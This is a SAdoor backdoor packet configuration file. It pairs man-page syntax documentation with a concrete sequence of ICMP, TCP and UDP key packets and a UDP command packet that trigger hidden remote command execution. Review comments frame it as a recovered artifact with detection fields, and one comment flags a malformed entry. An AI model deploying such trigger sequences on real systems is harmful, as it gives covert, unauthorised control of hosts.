#
# NAME
#        packets.txt - SAdoor packet configuration file
#
# DESCRIPTION
#        The  sadoor.pkts file contains the packets required by 
#        SAdoor to run a command or establish a connection  to  
#        a client.  Everything after a '#' is interpreted as a 
#        comment, and empty lines are ignored.
#
#        The file is expected to start with a  set  of  key-packets
#        followed  by  a  command-packet. The minimum configuration
#        consists of a single key-packet  followed  by  a  command-
#        packet.
#
# SYNTAX
#        Key packet syntax:
#        keypkt ['('replicate')'] '{'packet'}'
#
#        Command packet syntax:
#        cmdpkt '{'packet'}'
#
#        Where replicate is the number of times that the key packet
#        should be replicated.  This is useful if you want a number
#        of identical packets to appear in sequence; sadoor then
#        expects the packet to appear replicate+1 times.
#
#        Packet syntax:
#        ip '{'daddr = ipv4addr';' [options] proto'{'[options]'}}'
#
#        As  we can see above, a destination address and a protocol
#        (udp, tcp or icmp) are required in all packets.
#
#        The optional settings are set as keyword = value';'.
#        Numeric values can be given in base 2, 8 or 16 (with the
#        prefix 0b, 0 or 0x respectively) or in base 10.  The optional
#        settings, with their keywords and expected values, follow.
#
#
#    OPTIONAL IP SETTINGS
#        saddr (dotted decimal)
#            Source IPv4 address.
#
#        tos (unsigned 8 bit)
#            Type of service. Typical values:
#
#            Telnet/Rlogin      0x10
#            FTP control        0x10
#            FTP data           0x08
#            TFTP               0x10
#            SMTP command       0x10
#            SMTP data          0x08
#            DNS UDP query      0x10
#            DNS TCP query      0x00
#            DNS zone transfer  0x08
#            ICMP error/query   0x00
#            IGP                0x04
#            SNMP               0x04
#            BOOTP              0x00
#            NNTP               0x02
#
#        id (unsigned 16 bit)
#            Identification number
#
#        ttl (unsigned 8 bit)
#            Time  to  live.   If  set, it is possible to configure
#            the client to add a value to the one required to  compen-
#            sate for reduction in transit.
#
#    OPTIONAL TCP SETTINGS
#        dport (unsigned 16 bit)
#            Destination port.
#
#        sport (unsigned 16 bit)
#            Source port.
#
#        flags (unsigned 6 bit or symbolic)
#            TCP control flags (URG ACK PSH RST SYN FIN).
#
#        seq (unsigned 32 bit)
#           Sequence number.
#
#        ack (unsigned 32 bit)
#            Acknowledge number.
#
#        data (see DATA section below)
#            Beginning of payload.
#
#    OPTIONAL UDP SETTINGS
#        dport (unsigned 16 bit)
#            Destination port.
#
#        sport (unsigned 16 bit)
#            Source port.
#
#        data (see DATA section below)
#            Beginning of payload.
#
#    OPTIONAL ICMP SETTINGS
#        type (unsigned 8 bit)
#            ICMP  type;  currently only 0 (echo reply) and 8 (echo
#            request) are supported.
#
#        code (unsigned 8 bit)
#            ICMP code, must be zero if set since type is  limited.
#
#        id (unsigned 16 bit)
#            Echo identity number.
#
#        seq (unsigned 16 bit)
#            Echo sequence number.
#
#        data (see DATA section below)
#            Beginning of payload.
#
#    DATA
#        Data represents the beginning of the payload in the
#        received packet (except for the command packet, where
#        the defined data also acts as an offset to the supplied
#        command).
#
#        Syntax:
#        data '{'data-string'}'
#
#        A data-string can't contain any whitespace, or certain
#        language-specific characters that would produce an error
#        (e.g. write '\x7d' instead of '}').
#
#        The following escape sequences are supported within the
#        data-string:
#
#         \e - Escape character
#         \a - Bell character
#         \b - Backspace character
#         \f - Form-feed character
#         \n - New-line character
#         \r - Carriage return character
#         \t - Tab character
#         \v - Vertical tab character
#         \s - Space character
#         \\ - Backslash character
#         \x - Interpret the next two characters as hex
#
# EXAMPLES
#         # Three echo-request packets from any address
#         # (the client can be configured to randomize or
#         # set a default value for source addresses
#         # on packets without a required source address).
#         keypkt(2)
#         {
#             ip {
#                 daddr = 192.168.1.1;
#                 icmp {
#                     type = 8;
#                     seq = 0;
#                 }
#             }
#         }
#
#         # HTTP GET request
#         keypkt {
#             ip {
#                 daddr = 192.168.1.1;
#                 tcp {
#                     dport = 80;
#                     flags = PSH ACK;
#                     data { GET\s/index.html\sHTTP/1.0\r\n }
#                 }
#             }
#         }
#
#         # UDP packet
#         # Here a TTL value of 255 is required, forcing the
#         # packet to be generated on the same segment as the
#         # machine running SAdoor.
#         keypkt {
#             ip {
#                 daddr = 192.168.1.1;
#                 ttl = 255;
#                 udp {
#                     dport = 2049;
#                     sport = 23056;
#                     data { \x01\x02\x03\x04\x05\x06 }
#                 }
#             }
#         }
#
#         # TCP SYN scan?
#         # Since this packet has a TTL value set,
#         # the client needs to add its number of hops
#         # away from the machine running SAdoor.
#         keypkt {
#             ip {
#                  daddr = 192.168.1.1;
#                  ttl = 39;
#                  tcp {
#                     dport = 80;
#                     flags = S;
#                 }
#             }
#         }
#
#         # A lot of requirements for this packet
#         keypkt {
#             ip {
#                daddr = 192.168.1.1;
#                saddr = 192.168.1.12;
#                id = 0xabcd;
#                ttl = 255;
#                tos = 0x10;
#                tcp {
#                    sport = 22309;
#                    dport = 23;
#                    flags = SYN ACK;
#                    seq = 0xc0ded;
#                    ack = 0xaaddccdd;
#                    data { thisisthebeginningofthepayload }
#                }
#            }
#         }
#
#         # The last packet is the command-packet.
#         # Since the beginning of the payload is set,
#         # the (encrypted) command is expected right
#         # after the defined data.
#         cmdpkt
#         {
#             ip {
#                 daddr = 192.168.1.1;
#                 tcp {
#                     sport = 23456;
#                     seq = 0xaabbccdd;
#                     ack = 0xeeffaabb;
#                     data { command\soffset\sdata }
#                 }
#             }
#         }
#
# BUGS
#        Some systems (like Solaris) alter the header on outgoing
#        packets.  AFAIK the only field affected in this release is
#        the IP-ID field, and you should avoid setting it if you
#        plan to use the client from a machine running Solaris.
#        If you find other limitations or bugs, please contact
#        the author.
#
#



# Echo request
# Key packet 1: ICMP echo request (type 8, code 0) addressed to
# 192.168.1.11, with echo identity 12345 and echo sequence number 0.
# The data block is 64 bytes that decode to the ASCII text
# "0123456789", "80", "a".."z", "A".."Z"; per the DATA section above it
# describes the beginning of the payload of the received packet.
# No saddr is set, so this entry places no requirement on the source
# address.
# NOTE(review): when this file is recovered from a host, the fixed
# id/seq pair and the payload prefix are the fields to match on in
# packet captures or IDS rules.
keypkt {
  ip {
    daddr = 192.168.1.11;  
    icmp {
      type = 8;
      code = 0;
      id = 12345;
      seq = 0;
      data {
        \x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x38\x30\x61\x62\x63\x64
        \x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74
        \x75\x76\x77\x78\x79\x7a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a
        \x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a
      } 
    }
  }
}

# Echo request
# Key packet 2: same as the previous echo request (same destination,
# echo identity 12345 and 64-byte payload prefix) except that the echo
# sequence number is 1. Because seq differs, the two packets are listed
# separately rather than with the keypkt(replicate) form.
keypkt {
    ip {
      daddr = 192.168.1.11;
      icmp {
         type = 8;
         code = 0;
         id = 12345;
         seq = 1;
         data {
           \x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x38\x30\x61\x62\x63\x64
           \x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74
           \x75\x76\x77\x78\x79\x7a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a
           \x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a
       }
     }
   }
}


# HTTP GET request
# Key packet 3: TCP segment to 192.168.1.11 port 80 with the PSH and ACK
# flags set, whose payload begins with "GET /index.html HTTP/1.0\r\n"
# (\s is the space escape). Source address, source port, seq and ack
# are not set in this entry.
keypkt {
  ip {
    daddr = 192.168.1.11;
    tcp {
      dport = 80;
      flags = PSH ACK;
      data {
        GET\s/index.html\sHTTP/1.0\r\n}
    }
  }
}

# NFS data
# Key packet 4: UDP datagram to 192.168.1.11, destination port 2049 and
# source port 34345, whose payload begins with six zero bytes.
# Both ports are set, so a matching packet needs this exact port pair.
keypkt {
  ip {
    daddr = 192.168.1.11;
    udp {
      dport = 2049;
      sport = 34345;
      data { \x00\x00\x00\x00\x00\x00 }
    }
  }
}

# Key packet 5: TCP segment to 192.168.1.11 with sequence number
# 0x5ad001; no ports or flags are set in this entry.
# NOTE(review): the DATA section above says \x interprets the next two
# characters as hex, but the data-string below contains a \x at the end
# of its first line and a \x followed by "ne"; neither is a two-digit
# hex value. As written this entry presumably does not parse, or does
# not match the text it appears to spell -- confirm against the parser.
keypkt {
  ip {
    daddr = 192.168.1.11;
    tcp {
      seq = 0x5ad001;
      data { SAdoor\x20is\x20running\x20on\x
             your\xnetwork! }
    }
  }
}


# Command packet
# Final entry, following the key packets as the file format requires:
# UDP datagram to 192.168.1.11, destination port 62381. The six data
# bytes (01 01 33 ff 00 12) are the start of the payload; per the DATA
# section above, in a command packet the defined data is also the
# offset after which the supplied (encrypted) command is expected.
# NOTE(review): for detection, the destination port together with this
# six-byte payload prefix is what identifies the command packet on the
# wire.
cmdpkt {
  ip {
    daddr = 192.168.1.11;
    udp {
      dport = 62381;
      data {\x01\x01\x33\xff\x00\x12 }
    }
  }
}


